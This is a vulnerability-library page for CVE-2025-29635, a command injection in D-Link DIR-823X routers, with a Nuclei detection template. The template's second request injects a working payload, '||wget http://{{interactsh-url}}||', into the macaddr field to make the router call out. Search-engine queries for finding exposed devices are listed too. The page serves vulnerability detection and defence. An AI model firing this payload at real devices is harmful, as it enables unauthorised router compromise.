/Vulnerability Library

D-Link DIR-823X set_prohibiting - Command Injection

CVE-2025-29635
Early Release

Description

D-Link DIR-823X 240126 and 240802 contain a command injection caused by sending a POST request to /goform/set_prohibiting, letting an authorized attacker execute arbitrary commands remotely, exploit requires attacker to be authorized.

Severity

High

CVSS Score

7.2

Exploit Probability

87%

Affected Product

dir-823x_firmware

Published Date

June 17, 2026

Template Author

pussycat0x

CVE-2025-29635.yaml
id: CVE-2025-29635

info:
  name: D-Link DIR-823X set_prohibiting - Command Injection
  author: pussycat0x
  severity: high
  description: |
    D-Link DIR-823X 240126 and 240802 contain a command injection caused by sending a POST request to /goform/set_prohibiting, letting an authorized attacker execute arbitrary commands remotely, exploit requires attacker to be authorized.
  impact: |
    Attackers can execute arbitrary commands on the device remotely, potentially leading to full device compromise.
  remediation: |
    Update to the latest firmware version provided by D-Link or contact vendor for patches.
  reference:
    - https://securityaffairs.com/191135/malware/mirai-botnet-exploits-cve-2025-29635-to-target-legacy-d-link-routers.html
    - https://github.com/D-Link-SA/CVE-2025-29635/blob/main/CVE-2025-29635.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-29635
  classification:
    cvss-score: 7.2
    cve-id: CVE-2025-29635
    epss-score: 0.87239
    epss-percentile: 0.99728
    cwe-id: CWE-78
  metadata:
    verified: false
    max-request: 1
    vendor: dlink
    product: dir-823x_firmware
    shodan-query: title:"D-Link"
    fofa-query: title="DIR-823X"
  tags: cve,cve2025,dlink,rce,kev,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - "contains(to_lower(body), 'dir-823')"
        internal: true

  - raw:
      - |
        POST /goform/set_prohibiting HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        macaddr=||wget http://{{interactsh-url}}||&token=00000000000000000000000000000000

    matchers:
      type: dsl
      dsl:
        - "contains(interactsh_protocol,'dns')"
        - "status_code == 200"
      condition: and
7.2Score

CVSS Metrics

CVE ID:
cve-2025-29635
CWE ID:
cwe-78

References

https://securityaffairs.com/191135/malware/mirai-botnet-exploits-cve-2025-29635-to-target-legacy-d-link-routers.htmlhttps://github.com/D-Link-SA/CVE-2025-29635/blob/main/CVE-2025-29635.mdhttps://nvd.nist.gov/vuln/detail/CVE-2025-29635

Remediation Steps

Update to the latest firmware version provided by D-Link or contact vendor for patches.